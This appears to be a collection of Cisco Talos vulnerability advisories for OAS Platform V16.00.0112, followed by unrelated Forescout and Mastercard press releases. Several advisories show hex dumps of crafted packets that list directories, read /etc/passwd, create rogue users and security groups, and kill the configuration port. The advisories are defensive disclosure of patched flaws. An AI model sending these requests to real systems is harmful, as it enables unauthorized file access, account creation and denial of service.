An information disclosure vulnerability exists in the OAS Engine SecureBrowseFile functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted network request can lead to a disclosure of sensitive information. An attacker can send a network request to trigger this vulnerability.

**Summary**

An information disclosure vulnerability exists in the OAS Engine SecureBrowseFile functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted network request can lead to a disclosure of sensitive information. An attacker can send a network request to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more.

By sending a properly-formatted unauthenticated configuration message to the OAS Platform, it is possible to get a directory listing at any location permissible by the underlying user. By default this message can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions. When a SecureBrowseFile command is successfully processed, the response will contain the output of a command similar to ls. This will provide a response similar to the following:

    0000   00 00 00 00 00 b0 b1 40 00 01 00 00 00 ff ff ff   .......@........
    0010   ff 01 00 00 00 00 00 00 00 10 01 00 00 00 06 00   ................
    0020   00 00 06 02 00 00 00 07 53 75 63 63 65 73 73 0a   ........Success.
    0030   09 03 00 00 00 09 04 00 00 00 09 05 00 00 00 09   ................
    0040   06 00 00 00 11 03 00 00 00 89 00 00 00 06 07 00   ................
    0050   00 00 0c 2f 65 74 63 2f 67 74 6b 2d 32 2e 30 06   .../etc/gtk-2.0.
    0060   08 00 00 00 0f 2f 65 74 63 2f 6d 6f 64 70 72 6f   ...../etc/modpro
    0070   62 65 2e 64 06 09 00 00 00 0d 2f 65 74 63 2f 6c   be.d....../etc/l
    0080   6f 67 63 68 65 63 6b 06 0a 00 00 00 0a 2f 65 74   ogcheck....../et
    0090   63 2f 64 63 6f 6e 66 06 0b 00 00 00 08 2f 65 74   c/dconf....../et
    00a0   63 2f 76 69 6d 06 0c 00 00 00 0d 2f 65 74 63 2f   c/vim....../etc/
    00b0   73 79 73 63 74 6c 2e 64 06 0d 00 00 00 0a 2f 65   sysctl.d....../e
    00c0   74 63 2f 72 63 32 2e 64 06 0e 00 00 00 0f 2f 65   tc/rc2.d....../e
    00d0   74 63 2f 72 65 73 6f 6c 76 63 6f 6e 66 06 0f 00   tc/resolvconf...
    00e0   00 00 0e 2f 65 74 63 2f 77 69 72 65 73 68 61 72   .../etc/wireshar
    00f0   6b 06 10 00 00 00 0e 2f 65 74 63 2f 70 72 6f 66   k....../etc/prof
    0100   69 6c 65 2e 64 06 11 00 00 00 10 2f 65 74 63 2f   ile.d....../etc/
    

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform and ensure that user account does not have any more permissions than absolutely necessary.

**Timeline**

2022-03-16 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-27169: TALOS-2022-1494 || Cisco Talos Intelligence Group

An information disclosure vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to arbitrary file read. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

An information disclosure vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to arbitrary file read. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

4.9 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more.

By sending a series of properly-formatted configuration messages to the OAS Platform, it is possible to read an arbitrary file at any location permissible by the underlying user. By default these messages can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions.

Before the transfer of a file will be accepted, it is necessary that a Security Group with File Transfer permissions and a User Account in that group exist. Both the Security Group and the User Account referred to here are elements within the OAS Platform, not on the underlying Linux machine. If an acceptable Security Group and User Account already exist, the necessary credentials can be sniffed off the network and used for the transfer. If they do not exist, they would need to be created before exploitation would be possible.

A valid SecureTransferFiles command resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   00 ff 00 00 40 00 40 06 a4 06 c0 a8 0a 6a c0 a8   ....@.@......j..
    0020   0a 38 c4 e4 e5 67 c9 f5 cd 34 94 6c 24 2e 80 18   .8...g...4.l$...
    0030   08 0a 21 f0 00 00 01 01 08 0a bb 15 e8 9d d6 18   ..!.............
    0040   2b 37 00 00 00 00 00 60 68 40 00 01 00 00 00 ff   +7.....`h@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 13   ................
    0070   53 65 63 75 72 65 54 72 61 6e 73 66 65 72 46 69   SecureTransferFi
    0080   6c 65 73 09 03 00 00 00 10 03 00 00 00 04 00 00   les.............
    0090   00 08 08 01 00 00 00 06 04 00 00 00 0d 4d 61 6c   .............Mal
    00a0   69 63 69 6f 75 73 55 73 65 72 06 05 00 00 00 20   iciousUser..... 
    00b0   31 4d 5a 4a 32 58 54 65 41 77 69 38 38 2b 61 59   1MZJ2XTeAwi88+aY
    00c0   78 62 55 30 37 76 2b 6b 34 47 57 4a 69 56 50 78   xbU07v+k4GWJiVPx
    00d0   09 06 00 00 00 10 06 00 00 00 01 00 00 00 09 07   ................
    00e0   00 00 00 10 07 00 00 00 03 00 00 00 08 08 02 00   ................
    00f0   00 00 06 08 00 00 00 03 6f 75 74 06 09 00 00 00   ........out.....
    0100   0b 2f 65 74 63 2f 70 61 73 73 77 64 0b            ./etc/passwd.
    

Once the required Security Group and User Account have been created, a file of choice can be read from the underlying linux machine at any path permissible by the user owning the oas-engine service, through use of the SecureTransferFiles command accompanied with the newly created (or sniffed) credentials. When a SecureTransferFiles command is successfully processed, the response will contain the contents of the requested file. This response resembles the following:

    0000   c4 b3 01 c3 ba c9 00 0c 29 5e b3 62 08 00 45 00   ........)^.b..E.
    0010   0a de 3b ca 40 00 40 06 5e 5d c0 a8 0a 38 c0 a8   ..;.@.@.^]...8..
    0020   0a 6a e5 67 c4 e4 94 6c 24 2e c9 f5 cd ff 80 18   .j.g...l$.......
    0030   01 fc a0 c3 00 00 01 01 08 0a d6 18 2b 3c bb 15   ............+<..
    0040   e8 9d 00 00 00 00 00 44 a5 40 00 01 00 00 00 ff   .......D.@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   02 00 00 00 06 02 00 00 00 07 53 75 63 63 65 73   ..........Succes
    0070   73 09 03 00 00 00 10 03 00 00 00 01 00 00 00 09   s...............
    0080   04 00 00 00 10 04 00 00 00 03 00 00 00 08 08 01   ................
    0090   00 00 00 06 05 00 00 00 0b 2f 65 74 63 2f 70 61   ........./etc/pa
    00a0   73 73 77 64 09 06 00 00 00 0f 06 00 00 00 38 0a   sswd..........8.
    00b0   00 00 02 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f   ...root:x:0:0:ro
    00c0   6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61   ot:/root:/bin/ba
    00d0   73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a   sh.daemon:x:1:1:
    00e0   64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e   daemon:/usr/sbin
    00f0   3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67   :/usr/sbin/nolog
    0100   69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e   in.bin:x:2:2:bin
    

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform and ensure that user account does not have any more permissions than absolutely necessary.

**Timeline**

2022-03-16 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-26067: TALOS-2022-1492 || Cisco Talos Intelligence Group

A cleartext transmission of sensitive information vulnerability exists in the OAS Engine configuration communications functionality of Open Automation Software OAS Platform V16.00.0112. A targeted network sniffing attack can lead to a disclosure of sensitive information. An attacker can sniff network traffic to trigger this vulnerability.

**Summary**

A cleartext transmission of sensitive information vulnerability exists in the OAS Engine configuration communications functionality of Open Automation Software OAS Platform V16.00.0112. A targeted network sniffing attack can lead to a disclosure of sensitive information. An attacker can sniff network traffic to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-319 - Cleartext Transmission of Sensitive Information

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more.

By default all configuration communication with the OAS Platform is sent in cleartext over TCP/58727. Some configuration commands such as SecureTransferFiles require an OAS User account in an authorized OAS Security Group. When a command with this requirement, or any request from a logged-in OAS Configuration Utility, is sent, the username and base64 password hash is included in the message. If an attacker is sniffing the network during this time it would be possible to extract this information and subsequently use it to successfully send additional configuration commands that require credentials.

A SecureTransferFiles message showing these credentials resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   02 b6 00 00 40 00 40 06 a2 4f c0 a8 0a 6a c0 a8   ....@.@..O...j..
    0020   0a 38 c4 ea e5 67 18 9e 24 8a 19 e0 9f df 80 18   .8...g..$.......
    0030   08 0a b5 4d 00 00 01 01 08 0a 36 5a a0 6d d6 19   ...M......6Z.m..
    0040   2e 41 00 00 00 00 00 d0 83 40 00 01 00 00 00 ff   .A.......@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 13   ................
    0070   53 65 63 75 72 65 54 72 61 6e 73 66 65 72 46 69   SecureTransferFi
    0080   6c 65 73 09 03 00 00 00 10 03 00 00 00 04 00 00   les.............
    0090   00 08 08 01 00 00 00 06 04 00 00 00 0d 4d 61 6c   .............Mal
    00a0   69 63 69 6f 75 73 55 73 65 72 06 05 00 00 00 20   iciousUser..... 
    00b0   31 4d 5a 4a 32 58 54 65 41 77 69 38 38 2b 61 59   1MZJ2XTeAwi88+aY
    00c0   78 62 55 30 37 76 2b 6b 34 47 57 4a 69 56 50 78   xbU07v+k4GWJiVPx
    00d0   09 06 00 00 00 10 06 00 00 00 01 00 00 00 09 07   ................
    00e0   00 00 00 10 07 00 00 00 04 00 00 00 08 08 01 00   ................
    00f0   00 00 06 08 00 00 00 13 2f 68 6f 6d 65 2f 6f 61   ......../home/oa
    0100   73 75 73 65 72 2f 2e 73 73 68 2f 06 09 00 00 00   suser/.ssh/.....
    

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to ensure that proper network segmentation is in place such that an attacker has the smallest possible access to the network on which the OAS Platform communicates. Additionally use a dedicated user account to run the OAS Platform, and ensure that user account does not have any more permissions than absolutely necessary.

**Timeline**

2022-03-16 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-26077: TALOS-2022-1490 || Cisco Talos Intelligence Group

An external config control vulnerability exists in the OAS Engine SecureAddUser functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to the creation of an OAS user account. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

An external config control vulnerability exists in the OAS Engine SecureAddUser functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to the creation of an OAS user account. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more.

By sending a series of properly-formatted unauthenticated configuration messages to the OAS Platform, it is possible to create a new OAS user account and apply a custom Security Group. By default these messages can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions.

Some configuration commands such as SecureTransferFiles require an OAS User account in an authorized OAS Security Group with File Transfer permissions before they can be successfully processed. The default security group that gets applied to users does not include this File Transfer permission.

Through use of the SecureAddUser and SecureConfigValues commands it is possible to create a new OAS user account and subsequently apply the custom OAS Security Group, all from an unauthenticated context.

A SecureAddUser request resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   00 a2 00 00 40 00 40 06 a4 63 c0 a8 0a 6a c0 a8   ....@.@..c...j..
    0020   0a 38 ce 09 e5 67 06 47 5a 92 c6 ae 37 55 80 18   .8...g.GZ...7U..
    0030   08 0a d7 e1 00 00 01 01 08 0a 6f c6 1a 48 0b 46   ..........o..H.F
    0040   28 d2 00 00 00 00 00 80 59 40 00 01 00 00 00 ff   (.......Y@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 0d   ................
    0070   53 65 63 75 72 65 41 64 64 55 73 65 72 09 03 00   SecureAddUser...
    0080   00 00 10 03 00 00 00 04 00 00 00 08 08 01 00 00   ................
    0090   00 06 04 00 00 00 00 09 04 00 00 00 06 05 00 00   ................
    00a0   00 0d 4d 61 6c 69 63 69 6f 75 73 55 73 65 72 0b   ..MaliciousUser.
    

A SecureConfigValues request resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   01 f8 00 00 40 00 40 06 a3 0d c0 a8 0a 6a c0 a8   ....@.@......j..
    0020   0a 38 ce 0a e5 67 13 16 a1 df 95 4d 1c 9b 80 18   .8...g.....M....
    0030   08 0a 4d 9b 00 00 01 01 08 0a 5c 3f 31 9e 0b 46   ..M.......\?1..F
    0040   28 d5 00 00 00 00 00 c0 7b 40 00 01 00 00 00 ff   (.......{@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 12   ................
    0070   53 65 63 75 72 65 43 6f 6e 66 69 67 56 61 6c 75   SecureConfigValu
    0080   65 73 09 03 00 00 00 10 03 00 00 00 05 00 00 00   es..............
    0090   08 08 01 00 00 00 06 04 00 00 00 00 09 04 00 00   ................
    00a0   00 06 05 00 00 00 05 55 73 65 72 73 09 06 00 00   .......Users....
    00b0   00 0f 06 00 00 00 4a 01 00 00 02 00 01 00 00 00   ......J.........
    00c0   ff ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00   ................
    00d0   00 03 00 00 00 08 08 01 00 00 00 06 02 00 00 00   ................
    00e0   0d 53 65 74 50 72 6f 70 65 72 74 69 65 73 09 03   .SetProperties..
    00f0   00 00 00 10 03 00 00 00 03 00 00 00 06 04 00 00   ................
    0100   00 0d 4d 61 6c 69 63 69 6f 75 73 55 73 65 72 09   ..MaliciousUser.
    0110   05 00 00 00 09 06 00 00 00 11 05 00 00 00 09 00   ................
    0120   00 00 06 07 00 00 00 04 4e 61 6d 65 06 08 00 00   ........Name....
    0130   00 08 50 61 73 73 77 6f 72 64 06 09 00 00 00 0d   ..Password......
    0140   53 65 63 75 72 69 74 79 47 72 6f 75 70 06 0a 00   SecurityGroup...
    0150   00 00 14 41 63 74 69 76 65 44 69 72 65 63 74 6f   ...ActiveDirecto
    0160   72 79 47 72 6f 75 70 06 0b 00 00 00 17 41 63 74   ryGroup......Act
    0170   69 76 65 44 69 72 65 63 74 6f 72 79 50 72 69 6f   iveDirectoryPrio
    0180   72 69 74 79 06 0c 00 00 00 06 46 69 65 6c 64 31   rity......Field1
    0190   06 0d 00 00 00 06 46 69 65 6c 64 32 06 0e 00 00   ......Field2....
    01a0   00 06 46 69 65 6c 64 33 06 0f 00 00 00 06 46 69   ..Field3......Fi
    01b0   65 6c 64 34 10 06 00 00 00 09 00 00 00 09 04 00   eld4............
    01c0   00 00 06 11 00 00 00 08 70 61 73 73 77 6f 72 64   ........password
    01d0   06 12 00 00 00 0e 4d 61 6c 69 63 69 6f 75 73 47   ......MaliciousG
    01e0   72 6f 75 70 06 13 00 00 00 00 08 08 00 00 00 00   roup............
    01f0   09 13 00 00 00 09 13 00 00 00 09 13 00 00 00 09   ................
    0200   13 00 00 00 0b 0b                                 ......
    

When successfully processed, this will result in a new OAS user account in the specified Security Group, giving that user any permissions allowed by the group. This user can then be used to successfully make authenticated requests to the platform.

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform and ensure that user account does not have any more permissions than absolutely necessary.

**Timeline**

2022-03-16 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-26303: TALOS-2022-1488 || Cisco Talos Intelligence Group

An external config control vulnerability exists in the OAS Engine SecureAddSecurity functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to the creation of a custom Security Group. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

An external config control vulnerability exists in the OAS Engine SecureAddSecurity functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to the creation of a custom Security Group. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more.

By sending a series of properly-formatted unauthenticated configuration messages to the OAS Platform, it is possible to create a custom OAS Security Group with File Transfer permissions. By default these messages can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions.

Some configuration commands such as SecureTransferFiles require an OAS User account in an authorized OAS Security Group with File Transfer permissions before they can be successfully processed. The default security group that gets applied to users does not include this File Transfer permission.

Through use of the SecureAddSecurity and SecureConfigValues commands, it is possible to create a custom Security Group and subsequently apply the File Transfer permission, all from an unauthenticated context.

A SecureAddSecurity request resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   00 a7 00 00 40 00 40 06 a4 5e c0 a8 0a 6a c0 a8   ....@.@..^...j..
    0020   0a 38 cd ee e5 67 3f 04 a9 84 85 4d 0a f7 80 18   .8...g?....M....
    0030   08 0a ea 48 00 00 01 01 08 0a ac ad ae 7b 0b 3f   ...H.........{.?
    0040   44 f4 00 00 00 00 00 c0 5a 40 00 01 00 00 00 ff   D.......Z@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 11   ................
    0070   53 65 63 75 72 65 41 64 64 53 65 63 75 72 69 74   SecureAddSecurit
    0080   79 09 03 00 00 00 10 03 00 00 00 04 00 00 00 08   y...............
    0090   08 01 00 00 00 06 04 00 00 00 00 09 04 00 00 00   ................
    00a0   06 05 00 00 00 0e 4d 61 6c 69 63 69 6f 75 73 47   ......MaliciousG
    00b0   72 6f 75 70 0b                                    roup.
    

A SecureConfigValues request resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   12 c6 00 00 40 00 40 06 92 3f c0 a8 0a 6a c0 a8   ....@.@..?...j..
    0020   0a 38 cd ef e5 67 15 48 18 a7 c9 2d 7e ac 80 18   .8...g.H...-~...
    0030   08 0a a8 ab 00 00 01 01 08 0a 90 8a 32 06 0b 3f   ............2..?
    0040   45 06 00 00 00 00 00 8a b2 40 00 01 00 00 00 ff   E........@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 12   ................
    0070   53 65 63 75 72 65 43 6f 6e 66 69 67 56 61 6c 75   SecureConfigValu
    0080   65 73 09 03 00 00 00 10 03 00 00 00 05 00 00 00   es..............
    0090   08 08 01 00 00 00 06 04 00 00 00 00 09 04 00 00   ................
    00a0   00 06 05 00 00 00 08 53 65 63 75 72 69 74 79 09   .......Security.
    00b0   06 00 00 00 0f 06 00 00 00 15 12 00 00 02 00 01   ................
    00c0   00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 10   ................
    00d0   01 00 00 00 03 00 00 00 08 08 01 00 00 00 06 02   ................
    00e0   00 00 00 0d 53 65 74 50 72 6f 70 65 72 74 69 65   ....SetPropertie
    00f0   73 09 03 00 00 00 10 03 00 00 00 03 00 00 00 06   s...............
    0100   04 00 00 00 0e 4d 61 6c 69 63 69 6f 75 73 47 72   .....MaliciousGr
    0110   6f 75 70 09 05 00 00 00 09 06 00 00 00 11 05 00   oup.............
    

When successfully processed, this will result in a new Security Group that can be applied to any new or existing user, giving that user any permissions allowed by the group.

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform and ensure that user account does not have any more permissions than absolutely necessary.

**Timeline**

2022-03-16 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-26043: TALOS-2022-1489 || Cisco Talos Intelligence Group

A denial of service vulnerability exists in the OAS Engine SecureConfigValues functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted network request can lead to loss of communications. An attacker can send a network request to trigger this vulnerability.

**Summary**

A denial of service vulnerability exists in the OAS Engine SecureConfigValues functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted network request can lead to loss of communications. An attacker can send a network request to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more.

By sending a properly-formatted unauthenticated configuration message to the OAS Platform, it is possible to change the port used for configuration changes. If the SecureConfigValues command is used to change the TCP Port parameter to an invalid value, the OAS Platform will stop listening for new configuration connections altogether. Invalid values consist of any port number outside of the available range (>65535) or any port already in use. By default this message can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions.

When a successful SecureConfigValues command is received, a response similar to the following will be returned:

    0000   00 00 00 00 00 80 44 40 00 01 00 00 00 ff ff ff   ......D@........
    0010   ff 01 00 00 00 00 00 00 00 11 01 00 00 00 02 00   ................
    0020   00 00 06 02 00 00 00 07 53 75 63 63 65 73 73 0a   ........Success.
    0030   0b                                                .
    

If either an invalid or in-use port was chosen, it will no longer be possible to communicate with the server. If a valid port that was not already in-use was chosen, communication will switch to that port.

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform, and ensure that user account does not have any more permissions than absolutely necessary.

**Timeline**

2022-03-16 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-26026: TALOS-2022-1491 || Cisco Talos Intelligence Group

New threat hunting and risk identification service provides organizations with an enterprise-wide baseline of their threat landscape and risk exposure.

San Jose, Calif., 24 May 2022 – Forescout Technologies, the leader in automated cybersecurity, today announced the launch of Forescout Frontline, a new threat hunting service utilizing a team of highly-trained cybersecurity analysts to support cybersecurity teams by proactively identifying risks, enabling accelerated incident response, and maturing security posture. Forescout is offering this complimentary service for organizations that lack the internal resources and visibility to defend themselves from cybersecurity attacks, including ransomware and advanced persistent threats (APT).

“Cybersecurity attacks are on the rise. Simultaneously, cybersecurity teams are perennially understaffed and under resourced. This has created a perfect storm,” said Shawn Taylor, vice president of threat defense. “Organizations are under immense pressure to cope with the scale and speed of attacks and the havoc caused by the adversaries. Forescout is launching this new service to help organizations defend against attacks by providing a complete and holistic view of their assets.”

Many organizations use multiple security tools across multiple teams to help identify threats and risks. However, insights may be limited due to siloed views of IT, IoT, IoMT or OT assets. Typically, a variety of these asset types exist across an organization’s digital terrain and are often interconnected, which means cybersecurity risk must be identified and tackled holistically.

Delivered by Forescout Frontline analysts, the Threat Hunting and Risk Identification Service overcomes staffing resources and asset visibility challenges to uncover threats and identify risks that may otherwise remain undiscovered. Forescout Frontline will help organizations:

Discover, validate and prioritize a wide variety of cyber threats and vulnerabilities across all assets, including IT, IoT, IoMT and OT

Analyze the context and risk associated with all findings

Leverage the comprehensive insights to develop effective risk mitigation and remediation strategies

A State of Florida Agency, which supports several key Florida departments, engaged Forescout Frontline to understand each instance of Log4j, a zero-day vulnerability in a popular Java logging framework, across the organization’s 220 sites in 16 diverse divisions. In less than a day and a half, Forescout Frontline delivered insights into thousands of assets with vulnerabilities such as Log4j and Windows-based PrintNightmare. Additionally, hundreds of Critical CVSS-rated vulnerabilities affecting infrastructure devices such as switches and routers were found. Finally, actionable intelligence concerning critical embedded IoT TCP-IP stack-based instances such as NUCLEUS: 13 and RIPPLE 20, insecure communications, and other risks were also discovered. Leveraging this free service shrunk time to mitigation and remediation of these security gaps and improved overall security posture.

“When Log4J broke, we knew it was a critical issue, but we lacked a full picture of the risk within our extended enterprise. The \[Forescout threat hunting\] report was way more thorough than I expected, with in-depth information and actionable intelligence. Not just on Log4j but on other critical vulnerabilities as well, and not just in general terms but exactly where they exist in our environment.” – Information Security Manager, State of Florida Agency

Forescout Frontline levels the cybersecurity playing field by operationalizing the vulnerability research and threat intelligence produced by Forescout’s Vedere Labs and enhancing it with the Forescout Continuum Platform to provide threat hunting services across multiple dimensions. Forescout Frontline analysts include former public sector and private sector threat hunters with training in threat detection and incident response.

To learn more about Forescout Frontline visit here and for further insight into how a State of Florida agency benefitted from this new service visit here.

**About Forescout**

Forescout Technologies, Inc. delivers automated cybersecurity across the digital terrain, maintaining continuous alignment of customers’ security frameworks with their digital realities, including all asset types – IT, OT, IoT, IoMT. The Forescout Continuum Platform provides complete asset visibility, continuous compliance, network segmentation and a strong foundation for Zero Trust. For more than 20 years, Fortune 100 organizations and government agencies have trusted Forescout to provide automated cybersecurity at scale. Forescout arms customers with data-powered intelligence to accurately detect risks and quickly remediate cyberthreats without disruption of critical business assets.

Managing cyber risk, together.

Forescout Launches Forescout Frontline to Help Organizations Tackle Ransomware and Real Time Threats

Experience Centre features emerging Mastercard products and solutions for securing digital payments on a global scale, including those developed locally in Vancouver.

**MAY 25, 2022**

  
Today, Mastercard unveiled the "Experience Centre” at its _Global Intelligence and Cyber Centre of Excellence_ (“Centre of Excellence”) in Vancouver, BC, where local, national and international tech communities are invited to collaborate on cyber security innovation. The Experience Centre also features emerging Mastercard products and solutions that are already securing digital payments on a global scale, including those developed locally in Vancouver.

“Rapid advancements in digital technology have changed the way we shop, pay, work and interact, but with increased convenience comes increased risk,” said Sasha Krstic, President of Mastercard Canada. “Building on the world-class innovations developed at our Centre of Excellence in Vancouver, this new Experience Centre offers a venue for much-needed industry collaboration to anticipate and neutralize ever-expanding cyber threats to our global digital economy.”

Announced in 2020, Mastercard’s _Global Intelligence and Cyber Centre of Excellence_ is leading innovation in cyber and intelligence (C&I), artificial intelligence (AI) and the Internet of Things (IoT). Research from the Centre is already enhancing Mastercard solutions, combining the Centre’s biometric security algorithms with existing cyber capabilities is creating new approaches to enhance online security. In just two-and-a-half years, the Centre of Excellence is making quick progress against its long-term goals, such as:

*   **filing more than 30 local patents** that will secure cyberspace by building confidence in our connected devices, reducing the presence of malicious bots, bad human actors, and establishing a seamless experience for online interactions; and
*   **creating and maintaining more than 230 quality tech jobs to date,** ranging from software engineers to data scientists to product and program managers, with many more roles to fill.

“We are achieving this unprecedented level of cyber security innovation by attracting top talent from across Canada and the world to work smarter, better and faster in a creative, inclusive environment embedded in Vancouver’s vibrant tech community,” said Sasha Krstic. “Mastercard’s Centre of Excellence is not only making digital payments safer for consumers and businesses everywhere, it’s helping cement Canada’s role as a global powerhouse in cyber security innovation.”

  
Investing in Canadian Innovation

